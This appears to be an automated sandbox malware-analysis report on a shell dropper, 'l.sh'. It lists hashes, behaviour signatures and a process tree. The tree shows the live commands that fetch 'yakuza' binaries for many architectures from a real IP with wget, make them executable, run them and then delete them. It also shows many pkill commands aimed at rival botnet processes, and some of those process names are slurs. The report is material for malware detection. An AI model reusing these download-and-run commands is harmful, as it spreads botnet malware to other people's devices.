Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
17-11-2024 09:07
Static task
static1
Behavioral task
behavioral1
Sample
l.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
l.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
l.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
l.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
l.sh
-
Size
1KB
-
MD5
b5a7f5f630bc2eee5f8a30ecc75b3e9c
-
SHA1
adc6352bb1ca055207d877c1fb3c7486adc0be20
-
SHA256
37b2c36f599fd5ba676cce6512abe7aa47c08605aacf3fa31b536054d6e067f7
-
SHA512
ad8c3562b969fa3f6ae958cde6202dace4fbabbf8da1d5c57e89cb707b77fd2e76154df4a5d4a719eb931763fa70de9d224b4c29f93320db5251c5acfc5ff679
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 693 chmod 712 chmod 758 chmod 698 chmod 724 chmod 735 chmod 746 chmod 774 chmod 667 chmod 680 chmod 687 chmod 791 chmod 814 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/yakuza.mips 669 yakuza.mips -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill -
Command and Scripting Interpreter: Unix Shell 1 TTPs 64 IoCs
Execute scripts via Unix Shell.
pid Process 1820 Process not Found 1232 sh 1340 sh 1463 sh 1317 sh 1696 sh 2076 Process not Found 1660 sh 1906 Process not Found 2004 Process not Found 1328 sh 2040 Process not Found 843 sh 1746 sh 1882 Process not Found 1167 sh 1403 sh 1844 Process not Found 920 sh 1113 sh 1758 sh 1636 sh 908 sh 977 sh 1006 sh 1648 sh 1856 Process not Found 1894 Process not Found 1832 Process not Found 2114 Process not Found 1380 sh 1440 sh 1391 sh 993 sh 1018 sh 1030 sh 1270 sh 1304 sh 1486 sh 889 sh 1537 sh 2064 Process not Found 2138 Process not Found 1428 sh 1575 sh 1674 sh 2028 Process not Found 1152 sh 1513 sh 1977 Process not Found 828 sh 1451 sh 1868 Process not Found 930 sh 943 sh 1244 sh 1686 sh 2052 Process not Found 1102 sh 1180 sh 1707 sh 1139 sh 1562 sh 865 sh -
description ioc Process File opened for reading /proc/601/cmdline pkill File opened for reading /proc/11/cmdline pkill File opened for reading /proc/796/status Process not Found File opened for reading /proc/294/cmdline pkill File opened for reading /proc/98/status pkill File opened for reading /proc/702/status pkill File opened for reading /proc/794/cmdline pkill File opened for reading /proc/140/cmdline pkill File opened for reading /proc/26/cmdline pkill File opened for reading /proc/15/cmdline pkill File opened for reading /proc/255/cmdline pkill File opened for reading /proc/98/status pkill File opened for reading /proc/152/cmdline pkill File opened for reading /proc/43/status pkill File opened for reading /proc/211/cmdline Process not Found File opened for reading /proc/1/cmdline pkill File opened for reading /proc/6/cmdline Process not Found File opened for reading /proc/700/status Process not Found File opened for reading /proc/14/cmdline pkill File opened for reading /proc/778/status pkill File opened for reading /proc/28/status Process not Found File opened for reading /proc/9/cmdline pkill File opened for reading /proc/796/cmdline pkill File opened for reading /proc/10/cmdline pkill File opened for reading /proc/24/cmdline pkill File opened for reading /proc/260/cmdline pkill File opened for reading /proc/294/cmdline pkill File opened for reading /proc/76/cmdline pkill File opened for reading /proc/7/cmdline pkill File opened for reading /proc/41/status Process not Found File opened for reading /proc/260/cmdline pkill File opened for reading /proc/760/status pkill File opened for reading /proc/106/status pkill File opened for reading /proc/3/status pkill File opened for reading /proc/17/status pkill File opened for reading /proc/4/status pkill File opened for reading /proc/797/cmdline pkill File opened for reading /proc/263/cmdline pkill File opened for reading /proc/702/cmdline pkill File opened for reading /proc/797/cmdline Process not Found File opened for reading /proc/211/status pkill File opened for reading /proc/700/cmdline pkill File opened for reading /proc/filesystems pkill File opened for reading /proc/275/cmdline Process not Found File opened for reading /proc/16/cmdline Process not Found File opened for reading /proc/211/cmdline pkill File opened for reading /proc/23/cmdline pkill File opened for reading /proc/600/cmdline pkill File opened for reading /proc/26/cmdline pkill File opened for reading /proc/797/status pkill File opened for reading /proc/211/status Process not Found File opened for reading /proc/22/status pkill File opened for reading /proc/255/cmdline pkill File opened for reading /proc/255/status pkill File opened for reading /proc/594/status pkill File opened for reading /proc/1832/cmdline Process not Found File opened for reading /proc/650/status pkill File opened for reading /proc/16/cmdline pkill File opened for reading /proc/1/status pkill File opened for reading /proc/29/status pkill File opened for reading /proc/18/status pkill File opened for reading /proc/108/cmdline pkill File opened for reading /proc/643/cmdline Process not Found File opened for reading /proc/600/status pkill -
System Network Configuration Discovery 1 TTPs 18 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1716 sh 1739 busybox 1743 sh 1758 sh 654 wget 1737 pkill 1744 pkill 1717 pkill 1722 busybox 1745 busybox 1759 pkill 1762 busybox 673 rm 674 wget 684 rm 669 yakuza.mips 682 yakuza.mipsel 1736 sh -
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/yakuza.sh wget File opened for modification /tmp/yakuza.x86 wget File opened for modification /tmp/yakuza.i686 wget File opened for modification /tmp/yakuza.m68k wget File opened for modification /tmp/yakuza.arm5 wget File opened for modification /tmp/yakuza.arm7 wget File opened for modification /tmp/yakuza.sparc wget File opened for modification /tmp/yakuza.mipsel wget File opened for modification /tmp/yakuza.arm6 wget File opened for modification /tmp/yakuza.ppc wget File opened for modification /tmp/yakuza.i586 wget File opened for modification /tmp/yakuza.arm4 wget File opened for modification /tmp/yakuza.mips wget
Processes
-
/tmp/l.sh/tmp/l.sh1⤵PID:647
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:654
-
-
/bin/chmodchmod +x yakuza.mips2⤵
- File and Directory Permissions Modification
PID:667
-
-
/tmp/yakuza.mips./yakuza.mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:669
-
-
/bin/rmrm -rf yakuza.mips2⤵
- System Network Configuration Discovery
PID:673
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.mipsel2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:674
-
-
/bin/chmodchmod +x yakuza.mipsel2⤵
- File and Directory Permissions Modification
PID:680
-
-
/tmp/yakuza.mipsel./yakuza.mipsel2⤵
- System Network Configuration Discovery
PID:682
-
-
/bin/rmrm -rf yakuza.mipsel2⤵
- System Network Configuration Discovery
PID:684
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.sh2⤵
- Writes file to tmp directory
PID:685
-
-
/bin/chmodchmod +x yakuza.sh2⤵
- File and Directory Permissions Modification
PID:687
-
-
/tmp/yakuza.sh./yakuza.sh2⤵PID:688
-
-
/bin/rmrm -rf yakuza.sh2⤵PID:691
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.x862⤵
- Writes file to tmp directory
PID:692
-
-
/bin/chmodchmod +x yakuza.x862⤵
- File and Directory Permissions Modification
PID:693
-
-
/tmp/yakuza.x86./yakuza.x862⤵PID:694
-
-
/bin/rmrm -rf yakuza.x862⤵PID:696
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.arm62⤵
- Writes file to tmp directory
PID:697
-
-
/bin/chmodchmod +x yakuza.arm62⤵
- File and Directory Permissions Modification
PID:698
-
-
/tmp/yakuza.arm6./yakuza.arm62⤵PID:699
-
/bin/shsh -c "pkill -9 902i13 || busybox pkill -9 902i13"3⤵PID:704
-
/usr/bin/pkillpkill -9 902i134⤵
- Reads CPU attributes
PID:706
-
-
/bin/busyboxbusybox pkill -9 902i134⤵PID:709
-
-
-
/bin/shsh -c "pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY"3⤵PID:723
-
/usr/bin/pkillpkill -9 BzSxLxBxeY4⤵PID:725
-
-
/bin/busyboxbusybox pkill -9 BzSxLxBxeY4⤵PID:731
-
-
-
/bin/shsh -c "pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7"3⤵PID:743
-
/usr/bin/pkillpkill -9 HOHO-LUGO74⤵PID:744
-
-
/bin/busyboxbusybox pkill -9 HOHO-LUGO74⤵PID:748
-
-
-
/bin/shsh -c "pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL"3⤵PID:768
-
/usr/bin/pkillpkill -9 HOHO-U79OL4⤵PID:770
-
-
/bin/busyboxbusybox pkill -9 HOHO-U79OL4⤵PID:773
-
-
-
/bin/shsh -c "pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87"3⤵PID:792
-
/usr/bin/pkillpkill -9 JuYfouyf874⤵
- Reads runtime system information
PID:799
-
-
/bin/busyboxbusybox pkill -9 JuYfouyf874⤵PID:807
-
-
-
/bin/shsh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"3⤵PID:827
-
/usr/bin/pkillpkill -9 NiGGeR69xd4⤵PID:829
-
-
/bin/busyboxbusybox pkill -9 NiGGeR69xd4⤵PID:836
-
-
-
/bin/shsh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"3⤵PID:842
-
/usr/bin/pkillpkill -9 SO190Ij1X4⤵
- Reads runtime system information
PID:845
-
-
/bin/busyboxbusybox pkill -9 SO190Ij1X4⤵PID:851
-
-
-
/bin/shsh -c "pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE"3⤵PID:867
-
/usr/bin/pkillpkill -9 LOLKIKEEEDDE4⤵PID:870
-
-
/bin/busyboxbusybox pkill -9 LOLKIKEEEDDE4⤵PID:877
-
-
-
/bin/shsh -c "pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e"3⤵PID:892
-
/usr/bin/pkillpkill -9 ekjheory98e4⤵PID:893
-
-
/bin/busyboxbusybox pkill -9 ekjheory98e4⤵PID:901
-
-
-
/bin/shsh -c "pkill -9 scansh4 || busybox pkill -9 scansh4"3⤵PID:911
-
/usr/bin/pkillpkill -9 scansh44⤵PID:912
-
-
/bin/busyboxbusybox pkill -9 scansh44⤵PID:917
-
-
-
/bin/shsh -c "pkill -9 MDMA || busybox pkill -9 MDMA"3⤵PID:923
-
/usr/bin/pkillpkill -9 MDMA4⤵
- Reads runtime system information
PID:924
-
-
/bin/busyboxbusybox pkill -9 MDMA4⤵PID:925
-
-
-
/bin/shsh -c "pkill -9 fdevalvex || busybox pkill -9 fdevalvex"3⤵PID:935
-
/usr/bin/pkillpkill -9 fdevalvex4⤵
- Reads CPU attributes
- Reads runtime system information
PID:936
-
-
/bin/busyboxbusybox pkill -9 fdevalvex4⤵PID:937
-
-
-
/bin/shsh -c "pkill -9 scanspc || busybox pkill -9 scanspc"3⤵PID:947
-
/usr/bin/pkillpkill -9 scanspc4⤵PID:948
-
-
/bin/busyboxbusybox pkill -9 scanspc4⤵PID:949
-
-
-
/bin/shsh -c "pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ"3⤵PID:959
-
/usr/bin/pkillpkill -9 MELTEDNINJAREALZ4⤵PID:960
-
-
/bin/busyboxbusybox pkill -9 MELTEDNINJAREALZ4⤵PID:961
-
-
-
/bin/shsh -c "pkill -9 flexsonskids || busybox pkill -9 flexsonskids"3⤵PID:971
-
/usr/bin/pkillpkill -9 flexsonskids4⤵
- Reads runtime system information
PID:972
-
-
/bin/busyboxbusybox pkill -9 flexsonskids4⤵PID:973
-
-
-
/bin/shsh -c "pkill -9 scanx86 || busybox pkill -9 scanx86"3⤵PID:984
-
/usr/bin/pkillpkill -9 scanx864⤵PID:985
-
-
/bin/busyboxbusybox pkill -9 scanx864⤵PID:988
-
-
-
/bin/shsh -c "pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL"3⤵PID:997
-
/usr/bin/pkillpkill -9 MISAKI-U79OL4⤵PID:999
-
-
/bin/busyboxbusybox pkill -9 MISAKI-U79OL4⤵PID:1002
-
-
-
/bin/shsh -c "pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe"3⤵PID:1010
-
/usr/bin/pkillpkill -9 foAxi102kxe4⤵
- Reads CPU attributes
PID:1012
-
-
/bin/busyboxbusybox pkill -9 foAxi102kxe4⤵PID:1016
-
-
-
/bin/shsh -c "pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj"3⤵PID:1022
-
/usr/bin/pkillpkill -9 swodjwodjwoj4⤵PID:1024
-
-
/bin/busyboxbusybox pkill -9 swodjwodjwoj4⤵PID:1029
-
-
-
/bin/shsh -c "pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l"3⤵PID:1035
-
/usr/bin/pkillpkill -9 MmKiy7f87l4⤵PID:1037
-
-
/bin/busyboxbusybox pkill -9 MmKiy7f87l4⤵PID:1039
-
-
-
/bin/shsh -c "pkill -9 freecookiex86 || busybox pkill -9 freecookiex86"3⤵PID:1046
-
/usr/bin/pkillpkill -9 freecookiex864⤵
- Reads runtime system information
PID:1049
-
-
/bin/busyboxbusybox pkill -9 freecookiex864⤵PID:1055
-
-
-
/bin/shsh -c "pkill -9 sysgpu || busybox pkill -9 sysgpu"3⤵PID:1060
-
/usr/bin/pkillpkill -9 sysgpu4⤵
- Reads runtime system information
PID:1064
-
-
/bin/busyboxbusybox pkill -9 sysgpu4⤵PID:1067
-
-
-
/bin/shsh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"3⤵PID:1076
-
/usr/bin/pkillpkill -9 NiGGeR69xd4⤵PID:1078
-
-
/bin/busyboxbusybox pkill -9 NiGGeR69xd4⤵PID:1080
-
-
-
/bin/shsh -c "pkill -9 frgege || busybox pkill -9 frgege"3⤵PID:1089
-
/usr/bin/pkillpkill -9 frgege4⤵PID:1090
-
-
/bin/busyboxbusybox pkill -9 frgege4⤵PID:1093
-
-
-
/bin/shsh -c "pkill -9 sysupdater || busybox pkill -9 sysupdater"3⤵PID:1100
-
/usr/bin/pkillpkill -9 sysupdater4⤵PID:1101
-
-
/bin/busyboxbusybox pkill -9 sysupdater4⤵PID:1106
-
-
-
/bin/shsh -c "pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd"3⤵PID:1114
-
/usr/bin/pkillpkill -9 0DnAzepd4⤵PID:1116
-
-
/bin/busyboxbusybox pkill -9 0DnAzepd4⤵PID:1117
-
-
-
/bin/shsh -c "pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69"3⤵PID:1125
-
/usr/bin/pkillpkill -9 NiGGeRD0nks694⤵PID:1126
-
-
/bin/busyboxbusybox pkill -9 NiGGeRD0nks694⤵PID:1128
-
-
-
/bin/shsh -c "pkill -9 frgreu || busybox pkill -9 frgreu"3⤵PID:1137
-
/usr/bin/pkillpkill -9 frgreu4⤵PID:1138
-
-
/bin/busyboxbusybox pkill -9 frgreu4⤵PID:1140
-
-
-
/bin/shsh -c "pkill -9 telnetd || busybox pkill -9 telnetd"3⤵PID:1149
-
/usr/bin/pkillpkill -9 telnetd4⤵PID:1150
-
-
/bin/busyboxbusybox pkill -9 telnetd4⤵PID:1151
-
-
-
/bin/shsh -c "pkill -9 0x766f6964 || busybox pkill -9 0x766f6964"3⤵PID:1161
-
/usr/bin/pkillpkill -9 0x766f69644⤵PID:1162
-
-
/bin/busyboxbusybox pkill -9 0x766f69644⤵PID:1163
-
-
-
/bin/shsh -c "pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337"3⤵PID:1170
-
/usr/bin/pkillpkill -9 NiGGeRd0nks13374⤵
- Reads CPU attributes
PID:1172
-
-
/bin/busyboxbusybox pkill -9 NiGGeRd0nks13374⤵PID:1175
-
-
-
/bin/shsh -c "pkill -9 gaft || busybox pkill -9 gaft"3⤵PID:1183
-
/usr/bin/pkillpkill -9 gaft4⤵
- Reads CPU attributes
PID:1184
-
-
/bin/busyboxbusybox pkill -9 gaft4⤵PID:1188
-
-
-
/bin/shsh -c "pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa"3⤵PID:1194
-
/usr/bin/pkillpkill -9 urasgbsigboa4⤵PID:1197
-
-
/bin/busyboxbusybox pkill -9 urasgbsigboa4⤵PID:1200
-
-
-
/bin/shsh -c "pkill -9 120i3UI49 || busybox pkill -9 120i3UI49"3⤵PID:1207
-
/usr/bin/pkillpkill -9 120i3UI494⤵
- Reads CPU attributes
PID:1209
-
-
/bin/busyboxbusybox pkill -9 120i3UI494⤵PID:1215
-
-
-
/bin/shsh -c "pkill -9 OaF3 || busybox pkill -9 OaF3"3⤵PID:1221
-
/usr/bin/pkillpkill -9 OaF34⤵PID:1223
-
-
/bin/busyboxbusybox pkill -9 OaF34⤵PID:1227
-
-
-
/bin/shsh -c "pkill -9 geae || busybox pkill -9 geae"3⤵PID:1233
-
/usr/bin/pkillpkill -9 geae4⤵
- Reads runtime system information
PID:1236
-
-
/bin/busyboxbusybox pkill -9 geae4⤵PID:1239
-
-
-
/bin/shsh -c "pkill -9 vaiolmao || busybox pkill -9 vaiolmao"3⤵PID:1246
-
/usr/bin/pkillpkill -9 vaiolmao4⤵
- Reads CPU attributes
PID:1248
-
-
/bin/busyboxbusybox pkill -9 vaiolmao4⤵PID:1253
-
-
-
/bin/shsh -c "pkill -9 123123a || busybox pkill -9 123123a"3⤵PID:1259
-
/usr/bin/pkillpkill -9 123123a4⤵
- Reads runtime system information
PID:1261
-
-
/bin/busyboxbusybox pkill -9 123123a4⤵PID:1265
-
-
-
/bin/shsh -c "pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D"3⤵PID:1273
-
/usr/bin/pkillpkill -9 Ofurain0n4H34D4⤵PID:1274
-
-
/bin/busyboxbusybox pkill -9 Ofurain0n4H34D4⤵PID:1279
-
-
-
/bin/shsh -c "pkill -9 ggTrex || busybox pkill -9 ggTrex"3⤵PID:1285
-
/usr/bin/pkillpkill -9 ggTrex4⤵PID:1286
-
-
/bin/busyboxbusybox pkill -9 ggTrex4⤵PID:1290
-
-
-
/bin/shsh -c "pkill -9 wasads || busybox pkill -9 wasads"3⤵PID:1297
-
/usr/bin/pkillpkill -9 wasads4⤵PID:1298
-
-
/bin/busyboxbusybox pkill -9 wasads4⤵PID:1299
-
-
-
/bin/shsh -c "pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD"3⤵PID:1309
-
/usr/bin/pkillpkill -9 1293194hjXD4⤵PID:1310
-
-
/bin/busyboxbusybox pkill -9 1293194hjXD4⤵PID:1311
-
-
-
/bin/shsh -c "pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn"3⤵PID:1321
-
/usr/bin/pkillpkill -9 OthLaLosn4⤵PID:1322
-
-
/bin/busyboxbusybox pkill -9 OthLaLosn4⤵PID:1323
-
-
-
/bin/shsh -c "pkill -9 ggt || busybox pkill -9 ggt"3⤵PID:1333
-
/usr/bin/pkillpkill -9 ggt4⤵PID:1334
-
-
/bin/busyboxbusybox pkill -9 ggt4⤵PID:1335
-
-
-
/bin/shsh -c "pkill -9 wget-log || busybox pkill -9 wget-log"3⤵PID:1343
-
/usr/bin/pkillpkill -9 wget-log4⤵PID:1345
-
-
/bin/busyboxbusybox pkill -9 wget-log4⤵PID:1347
-
-
-
/bin/shsh -c "pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER"3⤵PID:1355
-
/usr/bin/pkillpkill -9 1337SoraLOADER4⤵
- Reads CPU attributes
PID:1356
-
-
/bin/busyboxbusybox pkill -9 1337SoraLOADER4⤵PID:1361
-
-
-
/bin/shsh -c "pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA"3⤵PID:1370
-
/usr/bin/pkillpkill -9 SAIAKINA4⤵PID:1371
-
-
/bin/busyboxbusybox pkill -9 SAIAKINA4⤵PID:1375
-
-
-
/bin/shsh -c "pkill -9 ggtq || busybox pkill -9 ggtq"3⤵PID:1383
-
/usr/bin/pkillpkill -9 ggtq4⤵PID:1384
-
-
/bin/busyboxbusybox pkill -9 ggtq4⤵PID:1387
-
-
-
/bin/shsh -c "pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2"3⤵PID:1395
-
/usr/bin/pkillpkill -9 1378bfp919GRB1Q24⤵PID:1397
-
-
/bin/busyboxbusybox pkill -9 1378bfp919GRB1Q24⤵PID:1399
-
-
-
/bin/shsh -c "pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO"3⤵PID:1408
-
/usr/bin/pkillpkill -9 SAIAKUSO4⤵PID:1410
-
-
/bin/busyboxbusybox pkill -9 SAIAKUSO4⤵PID:1412
-
-
-
/bin/shsh -c "pkill -9 ggtr || busybox pkill -9 ggtr"3⤵PID:1421
-
/usr/bin/pkillpkill -9 ggtr4⤵PID:1422
-
-
/bin/busyboxbusybox pkill -9 ggtr4⤵PID:1424
-
-
-
/bin/shsh -c "pkill -9 14Fa || busybox pkill -9 14Fa"3⤵PID:1432
-
/usr/bin/pkillpkill -9 14Fa4⤵
- Reads runtime system information
PID:1434
-
-
/bin/busyboxbusybox pkill -9 14Fa4⤵PID:1435
-
-
-
/bin/shsh -c "pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337"3⤵PID:1443
-
/usr/bin/pkillpkill -9 SEXSLAVE13374⤵
- Reads CPU attributes
PID:1445
-
-
/bin/busyboxbusybox pkill -9 SEXSLAVE13374⤵PID:1447
-
-
-
/bin/shsh -c "pkill -9 ggtt || busybox pkill -9 ggtt"3⤵PID:1456
-
/usr/bin/pkillpkill -9 ggtt4⤵PID:1458
-
-
/bin/busyboxbusybox pkill -9 ggtt4⤵PID:1459
-
-
-
/bin/shsh -c "pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4"3⤵PID:1469
-
/usr/bin/pkillpkill -9 1902a3u912u3u44⤵
- Reads CPU attributes
PID:1471
-
-
/bin/busyboxbusybox pkill -9 1902a3u912u3u44⤵PID:1475
-
-
-
/bin/shsh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"3⤵PID:1481
-
/usr/bin/pkillpkill -9 SO190Ij1X4⤵PID:1482
-
-
/bin/busyboxbusybox pkill -9 SO190Ij1X4⤵PID:1488
-
-
-
/bin/shsh -c "pkill -9 haetrghbr || busybox pkill -9 haetrghbr"3⤵PID:1493
-
/usr/bin/pkillpkill -9 haetrghbr4⤵PID:1494
-
-
/bin/busyboxbusybox pkill -9 haetrghbr4⤵PID:1499
-
-
-
/bin/shsh -c "pkill -9 19ju3d || busybox pkill -9 19ju3d"3⤵PID:1505
-
/usr/bin/pkillpkill -9 19ju3d4⤵
- Reads CPU attributes
PID:1506
-
-
/bin/busyboxbusybox pkill -9 19ju3d4⤵PID:1507
-
-
-
/bin/shsh -c "pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120"3⤵PID:1517
-
/usr/bin/pkillpkill -9 SORAojkf1204⤵PID:1518
-
-
/bin/busyboxbusybox pkill -9 SORAojkf1204⤵PID:1519
-
-
-
/bin/shsh -c "pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92"3⤵PID:1529
-
/usr/bin/pkillpkill -9 hehahejeje924⤵PID:1530
-
-
/bin/busyboxbusybox pkill -9 hehahejeje924⤵PID:1531
-
-
-
/bin/shsh -c "pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91"3⤵PID:1541
-
/usr/bin/pkillpkill -9 2U2JDJA901F914⤵PID:1542
-
-
/bin/busyboxbusybox pkill -9 2U2JDJA901F914⤵PID:1543
-
-
-
/bin/shsh -c "pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12"3⤵PID:1553
-
/usr/bin/pkillpkill -9 SlaVLav124⤵PID:1554
-
-
/bin/busyboxbusybox pkill -9 SlaVLav124⤵PID:1555
-
-
-
/bin/shsh -c "pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh"3⤵PID:1565
-
/usr/bin/pkillpkill -9 helpmedaddthhhhh4⤵PID:1566
-
-
/bin/busyboxbusybox pkill -9 helpmedaddthhhhh4⤵PID:1571
-
-
-
/bin/shsh -c "pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq"3⤵PID:1577
-
/usr/bin/pkillpkill -9 2wgg9qphbq4⤵PID:1579
-
-
/bin/busyboxbusybox pkill -9 2wgg9qphbq4⤵PID:1583
-
-
-
/bin/shsh -c "pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices"3⤵PID:1590
-
/usr/bin/pkillpkill -9 Slav3Th3seD3vices4⤵PID:1591
-
-
/bin/busyboxbusybox pkill -9 Slav3Th3seD3vices4⤵PID:1595
-
-
-
/bin/shsh -c "pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ"3⤵PID:1603
-
/usr/bin/pkillpkill -9 hzSmYZjYMQ4⤵PID:1604
-
-
/bin/busyboxbusybox pkill -9 hzSmYZjYMQ4⤵PID:1607
-
-
-
/bin/shsh -c "pkill -9 5Gbf || busybox pkill -9 5Gbf"3⤵PID:1615
-
/usr/bin/pkillpkill -9 5Gbf4⤵PID:1616
-
-
/bin/busyboxbusybox pkill -9 5Gbf4⤵PID:1619
-
-
-
/bin/shsh -c "pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL"3⤵PID:1627
-
/usr/bin/pkillpkill -9 SoRAxD123LOL4⤵PID:1628
-
-
/bin/busyboxbusybox pkill -9 SoRAxD123LOL4⤵PID:1631
-
-
-
/bin/shsh -c "pkill -9 iaGv || busybox pkill -9 iaGv"3⤵PID:1639
-
/usr/bin/pkillpkill -9 iaGv4⤵PID:1640
-
-
/bin/busyboxbusybox pkill -9 iaGv4⤵PID:1643
-
-
-
/bin/shsh -c "pkill -9 5aA3 || busybox pkill -9 5aA3"3⤵PID:1651
-
/usr/bin/pkillpkill -9 5aA34⤵PID:1652
-
-
/bin/busyboxbusybox pkill -9 5aA34⤵PID:1656
-
-
-
/bin/shsh -c "pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL"3⤵PID:1664
-
/usr/bin/pkillpkill -9 SoRAxD420LOL4⤵PID:1667
-
-
/bin/busyboxbusybox pkill -9 SoRAxD420LOL4⤵PID:1671
-
-
-
/bin/shsh -c "pkill -9 insomni || busybox pkill -9 insomni"3⤵PID:1679
-
/usr/bin/pkillpkill -9 insomni4⤵PID:1680
-
-
/bin/busyboxbusybox pkill -9 insomni4⤵PID:1684
-
-
-
/bin/shsh -c "pkill -9 640277 || busybox pkill -9 640277"3⤵PID:1691
